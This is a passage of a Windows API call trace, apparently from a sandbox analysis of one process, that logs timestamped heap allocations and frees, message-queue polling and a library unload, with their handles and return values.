returned 0x9ba1c8 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.566] FreeLibrary (hLibModule=0x75c90000) returned 1 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.568] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0181.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.568] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0181.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0181.569] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0181.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0181.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0181.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0181.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0181.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0181.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.571] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0181.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0181.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0181.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.576] 